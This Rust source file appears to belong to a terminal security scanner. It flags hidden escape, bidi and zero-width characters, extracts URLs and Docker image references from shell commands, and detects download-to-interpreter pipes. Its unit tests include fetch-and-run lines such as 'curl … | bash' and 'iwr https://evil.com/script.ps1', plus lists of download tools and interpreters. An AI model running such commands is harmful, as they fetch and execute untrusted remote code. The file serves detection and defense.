1use once_cell::sync::Lazy;
2use regex::Regex;
3
4use crate::parse::{self, UrlLike};
5use crate::tokenize::{self, Segment, ShellType};
6
7#[derive(Debug, Clone, Copy, PartialEq, Eq)]
9pub enum ScanContext {
10 Exec,
12 Paste,
14}
15
16#[allow(dead_code)]
18mod tier1_generated {
19 include!(concat!(env!("OUT_DIR"), "/tier1_gen.rs"));
20}
21
22pub fn extractor_ids() -> &'static [&'static str] {
24 tier1_generated::EXTRACTOR_IDS
25}
26
27static TIER1_EXEC_REGEX: Lazy<Regex> = Lazy::new(|| {
29 Regex::new(tier1_generated::TIER1_EXEC_PATTERN).expect("tier1 exec regex must compile")
30});
31
32static TIER1_PASTE_REGEX: Lazy<Regex> = Lazy::new(|| {
34 Regex::new(tier1_generated::TIER1_PASTE_PATTERN).expect("tier1 paste regex must compile")
35});
36
37static URL_REGEX: Lazy<Regex> = Lazy::new(|| {
39 Regex::new(
40 r#"(?:(?:https?|ftp|ssh|git)://[^\s'"<>]+)|(?:[a-zA-Z0-9._-]+@[a-zA-Z0-9._-]+:[^\s'"<>]+)"#,
41 )
42 .expect("url regex must compile")
43});
44
45pub struct ByteScanResult {
47 pub has_ansi_escapes: bool,
48 pub has_control_chars: bool,
49 pub has_bidi_controls: bool,
50 pub has_zero_width: bool,
51 pub has_invalid_utf8: bool,
52 pub details: Vec<ByteFinding>,
53}
54
55pub struct ByteFinding {
56 pub offset: usize,
57 pub byte: u8,
58 pub description: String,
59}
60
61pub fn tier1_scan(input: &str, context: ScanContext) -> bool {
63 match context {
64 ScanContext::Exec => TIER1_EXEC_REGEX.is_match(input),
65 ScanContext::Paste => TIER1_PASTE_REGEX.is_match(input),
66 }
67}
68
69pub fn scan_bytes(input: &[u8]) -> ByteScanResult {
71 let mut result = ByteScanResult {
72 has_ansi_escapes: false,
73 has_control_chars: false,
74 has_bidi_controls: false,
75 has_zero_width: false,
76 has_invalid_utf8: false,
77 details: Vec::new(),
78 };
79
80 if std::str::from_utf8(input).is_err() {
82 result.has_invalid_utf8 = true;
83 }
84
85 let len = input.len();
86 let mut i = 0;
87 while i < len {
88 let b = input[i];
89
90 if b == 0x1b {
92 if i + 1 < len {
93 let next = input[i + 1];
94 if next == b'[' || next == b']' || next == b'_' || next == b'P' {
95 result.has_ansi_escapes = true;
96 result.details.push(ByteFinding {
97 offset: i,
98 byte: b,
99 description: match next {
100 b'[' => "CSI escape sequence",
101 b']' => "OSC escape sequence",
102 b'_' => "APC escape sequence",
103 b'P' => "DCS escape sequence",
104 _ => "escape sequence",
105 }
106 .to_string(),
107 });
108 i += 2;
109 continue;
110 }
111 } else {
112 result.has_ansi_escapes = true;
114 result.details.push(ByteFinding {
115 offset: i,
116 byte: b,
117 description: "trailing escape byte".to_string(),
118 });
119 }
120 }
121
122 if b < 0x20 && b != b'\n' && b != b'\t' && b != 0x1b {
124 result.has_control_chars = true;
125 result.details.push(ByteFinding {
126 offset: i,
127 byte: b,
128 description: format!("control character 0x{b:02x}"),
129 });
130 }
131
132 if b == 0x7F {
134 result.has_control_chars = true;
135 result.details.push(ByteFinding {
136 offset: i,
137 byte: b,
138 description: "control character 0x7f (DEL)".to_string(),
139 });
140 }
141
142 if b >= 0xc0 {
144 let remaining = &input[i..];
146 if let Some(ch) = std::str::from_utf8(remaining)
147 .ok()
148 .or_else(|| std::str::from_utf8(&remaining[..remaining.len().min(4)]).ok())
149 .and_then(|s| s.chars().next())
150 {
151 if is_bidi_control(ch) {
153 result.has_bidi_controls = true;
154 result.details.push(ByteFinding {
155 offset: i,
156 byte: b,
157 description: format!("bidi control U+{:04X}", ch as u32),
158 });
159 }
160 if is_zero_width(ch) {
162 result.has_zero_width = true;
163 result.details.push(ByteFinding {
164 offset: i,
165 byte: b,
166 description: format!("zero-width character U+{:04X}", ch as u32),
167 });
168 }
169 i += ch.len_utf8();
170 continue;
171 }
172 }
173
174 i += 1;
175 }
176
177 result
178}
179
180fn is_bidi_control(ch: char) -> bool {
182 matches!(
183 ch,
184 '\u{200E}' | '\u{200F}' | '\u{202A}' | '\u{202B}' | '\u{202C}' | '\u{202D}' | '\u{202E}' | '\u{2066}' | '\u{2067}' | '\u{2068}' | '\u{2069}' )
196}
197
198fn is_zero_width(ch: char) -> bool {
200 matches!(
201 ch,
202 '\u{200B}' | '\u{200C}' | '\u{200D}' | '\u{FEFF}' )
207}
208
209pub fn extract_urls(input: &str, shell: ShellType) -> Vec<ExtractedUrl> {
212 let segments = tokenize::tokenize(input, shell);
213 let mut results = Vec::new();
214
215 for (seg_idx, segment) in segments.iter().enumerate() {
216 for mat in URL_REGEX.find_iter(&segment.raw) {
218 let raw = mat.as_str().to_string();
219 let url = parse::parse_url(&raw);
220 results.push(ExtractedUrl {
221 raw,
222 parsed: url,
223 segment_index: seg_idx,
224 in_sink_context: is_sink_context(segment, &segments),
225 });
226 }
227
228 let is_docker_cmd = segment.command.as_ref().is_some_and(|cmd| {
231 let cmd_lower = cmd.to_lowercase();
232 matches!(cmd_lower.as_str(), "docker" | "podman" | "nerdctl")
233 });
234 if is_sink_context(segment, &segments) && !is_docker_cmd {
235 for arg in &segment.args {
236 let clean = strip_quotes(arg);
237 if looks_like_schemeless_host(&clean) && !URL_REGEX.is_match(&clean) {
238 results.push(ExtractedUrl {
239 raw: clean.clone(),
240 parsed: UrlLike::SchemelessHostPath {
241 host: extract_host_from_schemeless(&clean),
242 path: extract_path_from_schemeless(&clean),
243 },
244 segment_index: seg_idx,
245 in_sink_context: true,
246 });
247 }
248 }
249 }
250
251 if let Some(cmd) = &segment.command {
253 let cmd_lower = cmd.to_lowercase();
254 if matches!(cmd_lower.as_str(), "docker" | "podman" | "nerdctl") {
255 if let Some(docker_subcmd) = segment.args.first() {
256 let subcmd_lower = docker_subcmd.to_lowercase();
257 if subcmd_lower == "build" {
258 let mut i = 1;
260 while i < segment.args.len() {
261 let arg = strip_quotes(&segment.args[i]);
262 if (arg == "-t" || arg == "--tag") && i + 1 < segment.args.len() {
263 let tag_val = strip_quotes(&segment.args[i + 1]);
264 if !tag_val.is_empty() {
265 let docker_url = parse::parse_docker_ref(&tag_val);
266 results.push(ExtractedUrl {
267 raw: tag_val,
268 parsed: docker_url,
269 segment_index: seg_idx,
270 in_sink_context: true,
271 });
272 }
273 i += 2;
274 } else if arg.starts_with("-t") && arg.len() > 2 {
275 let tag_val = strip_quotes(&arg[2..]);
276 let docker_url = parse::parse_docker_ref(&tag_val);
277 results.push(ExtractedUrl {
278 raw: tag_val,
279 parsed: docker_url,
280 segment_index: seg_idx,
281 in_sink_context: true,
282 });
283 i += 1;
284 } else if let Some(val) = arg.strip_prefix("--tag=") {
285 let tag_val = strip_quotes(val);
286 let docker_url = parse::parse_docker_ref(&tag_val);
287 results.push(ExtractedUrl {
288 raw: tag_val,
289 parsed: docker_url,
290 segment_index: seg_idx,
291 in_sink_context: true,
292 });
293 i += 1;
294 } else {
295 i += 1;
296 }
297 }
298 } else if subcmd_lower == "image" {
299 if let Some(image_subcmd) = segment.args.get(1) {
301 let image_subcmd_lower = image_subcmd.to_lowercase();
302 if matches!(
303 image_subcmd_lower.as_str(),
304 "pull" | "push" | "inspect" | "rm" | "tag"
305 ) {
306 extract_first_docker_image(
307 &segment.args[2..],
308 seg_idx,
309 &mut results,
310 );
311 }
312 }
313 } else if matches!(subcmd_lower.as_str(), "pull" | "run" | "create") {
314 extract_first_docker_image(&segment.args[1..], seg_idx, &mut results);
316 }
317 }
318 }
319 }
320 }
321
322 results
323}
324
325#[derive(Debug, Clone)]
327pub struct ExtractedUrl {
328 pub raw: String,
329 pub parsed: UrlLike,
330 pub segment_index: usize,
331 pub in_sink_context: bool,
332}
333
334const DOCKER_VALUE_FLAGS: &[&str] = &[
336 "--platform",
337 "--format",
338 "--filter",
339 "-f",
340 "--label",
341 "-l",
342 "--name",
343 "--hostname",
344 "--user",
345 "-u",
346 "--workdir",
347 "-w",
348 "--network",
349 "--net",
350 "--env",
351 "-e",
352 "--env-file",
353 "--publish",
354 "-p",
355 "--expose",
356 "--volume",
357 "-v",
358 "--mount",
359 "--add-host",
360 "--device",
361 "--entrypoint",
362 "--log-driver",
363 "--log-opt",
364 "--restart",
365 "--runtime",
366 "--cpus",
367 "--cpu-shares",
368 "--cpu-quota",
369 "--memory",
370 "--memory-reservation",
371 "--memory-swap",
372 "--shm-size",
373 "--ulimit",
374 "--security-opt",
375 "--sysctl",
376 "--tmpfs",
377 "--gpus",
378 "--ipc",
379 "--pid",
380 "--userns",
381 "--cgroupns",
382];
383
384const DOCKER_VALUE_PREFIXES: &[&str] = &["-p", "-e", "-v", "-l", "-u", "-w"];
386
387fn extract_first_docker_image(args: &[String], seg_idx: usize, results: &mut Vec<ExtractedUrl>) {
389 let mut skip_next = false;
390 for arg in args {
391 if skip_next {
392 skip_next = false;
393 continue;
394 }
395 let clean = strip_quotes(arg);
396 if clean == "--" {
397 break;
398 }
399 if clean.starts_with("--") && clean.contains('=') {
400 continue; }
402 if clean.starts_with('-') {
403 if DOCKER_VALUE_FLAGS.iter().any(|f| clean == *f) {
404 skip_next = true;
405 }
406 if DOCKER_VALUE_PREFIXES
407 .iter()
408 .any(|p| clean.starts_with(p) && clean.len() > p.len())
409 {
410 continue;
411 }
412 continue;
413 }
414 if !clean.contains("://") && clean != "." && clean != ".." && clean != "-" {
415 let docker_url = parse::parse_docker_ref(&clean);
416 results.push(ExtractedUrl {
417 raw: clean,
418 parsed: docker_url,
419 segment_index: seg_idx,
420 in_sink_context: true,
421 });
422 }
423 break; }
425}
426
427fn is_sink_context(segment: &Segment, _all_segments: &[Segment]) -> bool {
429 if let Some(cmd) = &segment.command {
430 let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd);
431 let cmd_lower = cmd_base.to_lowercase();
432 if is_source_command(&cmd_lower) {
433 return true;
434 }
435 }
436
437 if let Some(sep) = &segment.preceding_separator {
439 if sep == "|" || sep == "|&" {
440 if let Some(cmd) = &segment.command {
442 let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd);
443 if is_interpreter(cmd_base) {
444 return true;
445 }
446 }
447 }
448 }
449
450 false
451}
452
453fn is_source_command(cmd: &str) -> bool {
454 matches!(
455 cmd,
456 "curl"
457 | "wget"
458 | "fetch"
459 | "scp"
460 | "rsync"
461 | "git"
462 | "ssh"
463 | "docker"
464 | "podman"
465 | "nerdctl"
466 | "pip"
467 | "pip3"
468 | "npm"
469 | "npx"
470 | "yarn"
471 | "pnpm"
472 | "go"
473 | "cargo"
474 | "iwr"
475 | "irm"
476 | "invoke-webrequest"
477 | "invoke-restmethod"
478 )
479}
480
481fn is_interpreter(cmd: &str) -> bool {
482 matches!(
483 cmd,
484 "sh" | "bash"
485 | "zsh"
486 | "dash"
487 | "ksh"
488 | "python"
489 | "python3"
490 | "node"
491 | "perl"
492 | "ruby"
493 | "php"
494 | "iex"
495 | "invoke-expression"
496 )
497}
498
499fn strip_quotes(s: &str) -> String {
500 let s = s.trim();
501 if s.len() >= 2
502 && ((s.starts_with('"') && s.ends_with('"')) || (s.starts_with('\'') && s.ends_with('\'')))
503 {
504 s[1..s.len() - 1].to_string()
505 } else {
506 s.to_string()
507 }
508}
509
510fn looks_like_schemeless_host(s: &str) -> bool {
511 if s.starts_with('-') || !s.contains('.') {
513 return false;
514 }
515 let host_part = s.split('/').next().unwrap_or(s);
517 if !host_part.contains('.') || host_part.contains(' ') {
518 return false;
519 }
520 let file_exts = [
523 ".sh", ".py", ".rb", ".js", ".ts", ".go", ".rs", ".c", ".h", ".txt", ".md", ".json",
524 ".yaml", ".yml", ".xml", ".html", ".css", ".tar.gz", ".tar.bz2", ".tar.xz", ".tgz", ".zip",
525 ".gz", ".bz2", ".rpm", ".deb", ".pkg", ".dmg", ".exe", ".msi", ".dll", ".so", ".log",
526 ".conf", ".cfg", ".ini", ".toml",
527 ];
528 let host_lower = host_part.to_lowercase();
529 if file_exts.iter().any(|ext| host_lower.ends_with(ext)) {
530 return false;
531 }
532 let labels: Vec<&str> = host_part.split('.').collect();
534 if labels.len() < 2 {
535 return false;
536 }
537 let tld = labels.last().unwrap();
539 tld.len() >= 2 && tld.len() <= 63 && tld.chars().all(|c| c.is_ascii_alphabetic())
540}
541
542fn extract_host_from_schemeless(s: &str) -> String {
543 s.split('/').next().unwrap_or(s).to_string()
544}
545
546fn extract_path_from_schemeless(s: &str) -> String {
547 if let Some(idx) = s.find('/') {
548 s[idx..].to_string()
549 } else {
550 String::new()
551 }
552}
553
554#[cfg(test)]
555mod tests {
556 use super::*;
557
558 #[test]
559 fn test_tier1_exec_matches_url() {
560 assert!(tier1_scan("curl https://example.com", ScanContext::Exec));
561 }
562
563 #[test]
564 fn test_tier1_exec_no_match_simple() {
565 assert!(!tier1_scan("ls -la", ScanContext::Exec));
566 }
567
568 #[test]
569 fn test_tier1_exec_no_match_echo() {
570 assert!(!tier1_scan("echo hello world", ScanContext::Exec));
571 }
572
573 #[test]
574 fn test_tier1_exec_matches_pipe_bash() {
575 assert!(tier1_scan("something | bash", ScanContext::Exec));
576 }
577
578 #[test]
579 fn test_tier1_exec_matches_pipe_sudo_bash() {
580 assert!(tier1_scan("something | sudo bash", ScanContext::Exec));
581 }
582
583 #[test]
584 fn test_tier1_exec_matches_pipe_env_bash() {
585 assert!(tier1_scan("something | env bash", ScanContext::Exec));
586 }
587
588 #[test]
589 fn test_tier1_exec_matches_pipe_bin_bash() {
590 assert!(tier1_scan("something | /bin/bash", ScanContext::Exec));
591 }
592
593 #[test]
594 fn test_tier1_exec_matches_git_scp() {
595 assert!(tier1_scan(
596 "git clone git@github.com:user/repo",
597 ScanContext::Exec
598 ));
599 }
600
601 #[test]
602 fn test_tier1_exec_matches_punycode() {
603 assert!(tier1_scan(
604 "curl https://xn--example-cua.com",
605 ScanContext::Exec
606 ));
607 }
608
609 #[test]
610 fn test_tier1_exec_matches_docker() {
611 assert!(tier1_scan("docker pull malicious/image", ScanContext::Exec));
612 }
613
614 #[test]
615 fn test_tier1_exec_matches_iwr() {
616 assert!(tier1_scan(
617 "iwr https://evil.com/script.ps1",
618 ScanContext::Exec
619 ));
620 }
621
622 #[test]
623 fn test_tier1_exec_matches_curl() {
624 assert!(tier1_scan(
625 "curl https://example.com/install.sh",
626 ScanContext::Exec
627 ));
628 }
629
630 #[test]
631 fn test_tier1_exec_matches_lookalike_tld() {
632 assert!(tier1_scan("open file.zip", ScanContext::Exec));
633 }
634
635 #[test]
636 fn test_tier1_exec_matches_shortener() {
637 assert!(tier1_scan("curl bit.ly/abc", ScanContext::Exec));
638 }
639
640 #[test]
641 fn test_tier1_paste_matches_non_ascii() {
642 assert!(tier1_scan("café", ScanContext::Paste));
643 }
644
645 #[test]
646 fn test_tier1_paste_exec_patterns_also_match() {
647 assert!(tier1_scan("curl https://example.com", ScanContext::Paste));
648 }
649
650 #[test]
651 fn test_tier1_exec_no_non_ascii() {
652 assert!(!tier1_scan("echo café", ScanContext::Exec));
654 }
655
656 #[test]
657 fn test_byte_scan_ansi() {
658 let input = b"hello \x1b[31mred\x1b[0m world";
659 let result = scan_bytes(input);
660 assert!(result.has_ansi_escapes);
661 }
662
663 #[test]
664 fn test_byte_scan_control_chars() {
665 let input = b"hello\rworld";
666 let result = scan_bytes(input);
667 assert!(result.has_control_chars);
668 }
669
670 #[test]
671 fn test_byte_scan_bidi() {
672 let input = "hello\u{202E}dlrow".as_bytes();
673 let result = scan_bytes(input);
674 assert!(result.has_bidi_controls);
675 }
676
677 #[test]
678 fn test_byte_scan_zero_width() {
679 let input = "hel\u{200B}lo".as_bytes();
680 let result = scan_bytes(input);
681 assert!(result.has_zero_width);
682 }
683
684 #[test]
685 fn test_byte_scan_clean() {
686 let input = b"hello world\n";
687 let result = scan_bytes(input);
688 assert!(!result.has_ansi_escapes);
689 assert!(!result.has_control_chars);
690 assert!(!result.has_bidi_controls);
691 assert!(!result.has_zero_width);
692 }
693
694 #[test]
695 fn test_extract_urls_basic() {
696 let urls = extract_urls("curl https://example.com/install.sh", ShellType::Posix);
697 assert_eq!(urls.len(), 1);
698 assert_eq!(urls[0].raw, "https://example.com/install.sh");
699 }
700
701 #[test]
702 fn test_extract_urls_pipe() {
703 let urls = extract_urls(
704 "curl https://example.com/install.sh | bash",
705 ShellType::Posix,
706 );
707 assert!(!urls.is_empty());
708 assert!(urls[0].in_sink_context);
709 }
710
711 #[test]
712 fn test_extract_urls_scp() {
713 let urls = extract_urls("git clone git@github.com:user/repo.git", ShellType::Posix);
714 assert!(!urls.is_empty());
715 assert!(matches!(urls[0].parsed, UrlLike::Scp { .. }));
716 }
717
718 #[test]
719 fn test_extract_docker_ref() {
720 let urls = extract_urls("docker pull nginx", ShellType::Posix);
721 let docker_urls: Vec<_> = urls
722 .iter()
723 .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
724 .collect();
725 assert_eq!(docker_urls.len(), 1);
726 }
727
728 #[test]
729 fn test_extract_powershell_iwr() {
730 let urls = extract_urls(
731 "iwr https://example.com/script.ps1 | iex",
732 ShellType::PowerShell,
733 );
734 assert!(!urls.is_empty());
735 }
736
737 #[test]
738 fn test_strip_quotes_single_char() {
739 assert_eq!(strip_quotes("\""), "\"");
740 assert_eq!(strip_quotes("'"), "'");
741 }
742
743 #[test]
744 fn test_strip_quotes_empty() {
745 assert_eq!(strip_quotes(""), "");
746 }
747
748 #[test]
749 fn test_scan_bytes_bel_vt_del() {
750 let input = b"hello\x07world";
752 let result = scan_bytes(input);
753 assert!(result.has_control_chars);
754
755 let input = b"hello\x0Bworld";
757 let result = scan_bytes(input);
758 assert!(result.has_control_chars);
759
760 let input = b"hello\x0Cworld";
762 let result = scan_bytes(input);
763 assert!(result.has_control_chars);
764
765 let input = b"hello\x7Fworld";
767 let result = scan_bytes(input);
768 assert!(result.has_control_chars);
769 }
770
771 #[test]
772 fn test_scan_bytes_osc_apc_dcs() {
773 let input = b"hello\x1b]0;title\x07world";
775 let result = scan_bytes(input);
776 assert!(result.has_ansi_escapes);
777
778 let input = b"hello\x1b_dataworld";
780 let result = scan_bytes(input);
781 assert!(result.has_ansi_escapes);
782
783 let input = b"hello\x1bPdataworld";
785 let result = scan_bytes(input);
786 assert!(result.has_ansi_escapes);
787 }
788
789 #[test]
790 fn test_schemeless_long_tld() {
791 assert!(looks_like_schemeless_host("example.academy"));
792 assert!(looks_like_schemeless_host("example.photography"));
793 }
794
795 #[test]
796 fn test_segment_index_correct() {
797 let urls = extract_urls("curl https://a.com | wget https://b.com", ShellType::Posix);
798 for url in &urls {
800 assert!(url.segment_index <= 1);
802 }
803 }
804
805 #[test]
806 fn test_docker_build_context_not_image() {
807 let urls = extract_urls("docker build .", ShellType::Posix);
808 let docker_urls: Vec<_> = urls
809 .iter()
810 .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
811 .collect();
812 assert_eq!(
813 docker_urls.len(),
814 0,
815 "build context '.' should not be treated as image"
816 );
817 }
818
819 #[test]
820 fn test_docker_image_subcmd() {
821 let urls = extract_urls("docker image pull nginx", ShellType::Posix);
822 let docker_urls: Vec<_> = urls
823 .iter()
824 .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
825 .collect();
826 assert_eq!(docker_urls.len(), 1);
827 }
828
829 #[test]
834 fn test_tier1_module_boundary_enforcement() {
835 let ids = tier1_generated::EXTRACTOR_IDS;
837 assert!(!ids.is_empty(), "EXTRACTOR_IDS must not be empty");
838 let exec_count = tier1_generated::TIER1_EXEC_FRAGMENT_COUNT;
840 let paste_count = tier1_generated::TIER1_PASTE_FRAGMENT_COUNT;
841 assert!(exec_count > 0, "Must have exec fragments");
842 assert!(
843 paste_count >= exec_count,
844 "Paste fragments must be superset of exec fragments"
845 );
846 Regex::new(tier1_generated::TIER1_EXEC_PATTERN)
848 .expect("Generated exec pattern must be valid regex");
849 Regex::new(tier1_generated::TIER1_PASTE_PATTERN)
850 .expect("Generated paste pattern must be valid regex");
851 }
852}